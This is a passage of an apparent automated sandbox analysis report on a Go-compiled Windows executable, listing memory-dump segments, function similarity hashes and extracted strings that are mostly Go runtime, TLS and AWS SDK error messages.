              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: 2-by$2-by$2-by$2-by$expa$expa$expa$nd 3$nd 3$nd 3$nd 3$te k$te k$te k$te k
              • API String ID: 0-4277483314
              • Opcode ID: 315f0670882b33c046334e8fd1ff4c06d07018854da7278b9434ed673b3ca5e7
              • Instruction ID: 0105292980c3858ab6ca84ffce66e812c86817cdd9159eba4766768ea09c517a
              • Opcode Fuzzy Hash: 315f0670882b33c046334e8fd1ff4c06d07018854da7278b9434ed673b3ca5e7
              • Instruction Fuzzy Hash: 435134B48056408FD358CF0AC198BA1BBE1BF88304F2A86FAC4588F776E7768446CF51
              Function 007986A0 Relevance: 16.7, Strings: 13, Instructions: 463COMMON
              Download Yara Rule
              Strings
              • runtime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: duplicatehandle failedglobal runq empty wi, xrefs: 00798CF3
              • , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failed, xrefs: 00798D0D
              • nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod, xrefs: 00798CC6
              • runtime.SetFinalizer: pointer not at beginning of allocated blockinvalid value for environment variable, %s=%s, need true or falsetls: internal error: attempted to read record with QUIC transporttls: server selected an invalid version after a HelloRetryRequest, xrefs: 00798C48
              • +, xrefs: 00798D41
              • because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime., xrefs: 00798BC1
              • runtime.SetFinalizer: first argument was allocated into an arenacompileCallback: expected function with one uintptr-sized resultAWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY not found in environmentclient configured for accelerate but not supported for operationflat, xrefs: 00798CB0
              • (, xrefs: 00798CFD
              • runtime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan state, xrefs: 00798C9A
              • , not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 00798C1D
              • runtime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already , xrefs: 00798A75, 00798AFD, 00798B85
              • runtime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to add zero-sized address rangeruntime: block, xrefs: 00798C03
              • runtime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundroot level max pages doesn't fit in summaryru, xrefs: 00798D38
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.$($+$, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$, not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failed$nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod$runtime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already $runtime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: duplicatehandle failedglobal runq empty wi$runtime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundroot level max pages doesn't fit in summaryru$runtime.SetFinalizer: first argument was allocated into an arenacompileCallback: expected function with one uintptr-sized resultAWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY not found in environmentclient configured for accelerate but not supported for operationflat$runtime.SetFinalizer: pointer not at beginning of allocated blockinvalid value for environment variable, %s=%s, need true or falsetls: internal error: attempted to read record with QUIC transporttls: server selected an invalid version after a HelloRetryRequest$runtime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan state$runtime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to add zero-sized address rangeruntime: block
              • API String ID: 0-2378470748
              • Opcode ID: 72ac915f9b846a7269ca2c7d1594cf91e2007a8fb215fad24712c85575d28a98
              • Instruction ID: e1069a94d77def33ca93c33e6005b4083dcf17f9836c6e1919093819566201b8
              • Opcode Fuzzy Hash: 72ac915f9b846a7269ca2c7d1594cf91e2007a8fb215fad24712c85575d28a98
              • Instruction Fuzzy Hash: F4126574509345DFDB64DF24D080A6EBBE0BB8A340F54892EE8C98B351EB78D985CB53
              Function 0078BB50 Relevance: 14.0, Strings: 11, Instructions: 250COMMON
              Download Yara Rule
              Strings
              • bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double wait, xrefs: 0078BE8B, 0078BF17, 0078BFA3
              • bad system huge page sizearena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: p, xrefs: 0078BE29
              • ) must be a power of 2system huge page size (runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad pro, xrefs: 0078BE0E, 0078BE70
              • system page size (elem align too big but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantim, xrefs: 0078BE44, 0078BEA6, 0078BF32
              • system huge page size (runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime, xrefs: 0078BDE2
              • min size of malloc header is not a size class boundarygcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - deadlock!goroutine running on other thread; stack unavailableclient partition does not match provided ARN, xrefs: 0078BD9D
              • ) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:, xrefs: 0078BF5E
              • bad TinySizeClasskey align too bigruntime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 0078BFCF
              • ) is smaller than minimum page size (/cpu/classes/gc/mark/idle:cpu-secondssetprofilebucket: profile already setfailed to reserve page summary memoryruntime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpr, xrefs: 0078BED2
              • $, xrefs: 0078BF67
              • failed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default, xrefs: 0078BFB9
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: $$) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:$) is smaller than minimum page size (/cpu/classes/gc/mark/idle:cpu-secondssetprofilebucket: profile already setfailed to reserve page summary memoryruntime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpr$) must be a power of 2system huge page size (runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad pro$bad TinySizeClasskey align too bigruntime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb$bad system huge page sizearena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: p$bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double wait$failed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default$min size of malloc header is not a size class boundarygcControllerState.findRunnable: blackening not enabledno goroutines (main called runtime.Goexit) - deadlock!goroutine running on other thread; stack unavailableclient partition does not match provided ARN$system huge page size (runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime$system page size (elem align too big but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantim
              • API String ID: 0-3229082946
              • Opcode ID: ad3ae2b5796c2dd48327859a17fa4461c11de5c91890b2337b188c35f7f2ce14
              • Instruction ID: 6a7ab4f910b62700fef6da2bdc0c62bde2ed239c5d02946d1b7ce739403eeab9
              • Opcode Fuzzy Hash: ad3ae2b5796c2dd48327859a17fa4461c11de5c91890b2337b188c35f7f2ce14
              • Instruction Fuzzy Hash: 02C13AB4109305DFD354EF64E1887AABBE5FB88304F50892DE489C7395EB789848DF62
              Function 0078BFF0 Relevance: 12.9, Strings: 10, Instructions: 351COMMON
              Download Yara Rule
              Strings
              • ) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: , xrefs: 0078C565
              • arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p , xrefs: 0078C2FD
              • region exceeds uintptr rangeneed padding in bucket (key)/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime., xrefs: 0078C4B4
              • ., xrefs: 0078C5A2
              • misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:b, xrefs: 0078C4E6
              • out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit, xrefs: 0078C2D1
              • runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:b, xrefs: 0078C511
              • out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi, xrefs: 0078C2E7
              • memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new , xrefs: 0078C599
              • out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResume, xrefs: 0078C31D
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: ) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: $.$arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p $memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new $misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:b$out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit$out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResume$out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi$region exceeds uintptr rangeneed padding in bucket (key)/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.$runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:b
              • API String ID: 0-36820229
              • Opcode ID: c3b24fc0330ea1c67d7ea6b99e691f2da1c208cefe55dbfebbb332e96ae1c5b7
              • Instruction ID: f50c434d26fcb9a3b27bb3ed83385321ff397d609171713d7520198442ac8fe6
              • Opcode Fuzzy Hash: c3b24fc0330ea1c67d7ea6b99e691f2da1c208cefe55dbfebbb332e96ae1c5b7
              • Instruction Fuzzy Hash: 38F133B4548344CFC711EF68C1846AABBF0BF89704F05892DE8989B352E779E845CF92
              Function 007C8710 Relevance: 12.7, Strings: 10, Instructions: 243COMMON
              Download Yara Rule
              Strings
              • nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many, xrefs: 007C8A0C
              • runtime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a power of 2too many callback functionstimer when must b, xrefs: 007C89C2
              • checkdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangestrings: negative Re, xrefs: 007C8AA4
              • checkdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such de, xrefs: 007C8955
              • no goroutines (main called runtime.Goexit) - deadlock!goroutine running on other thread; stack unavailableclient partition does not match provided ARN partitiontls: server resumed a session with a different versiontls: server accepted 0-RTT with the wrong ci, xrefs: 007C881E
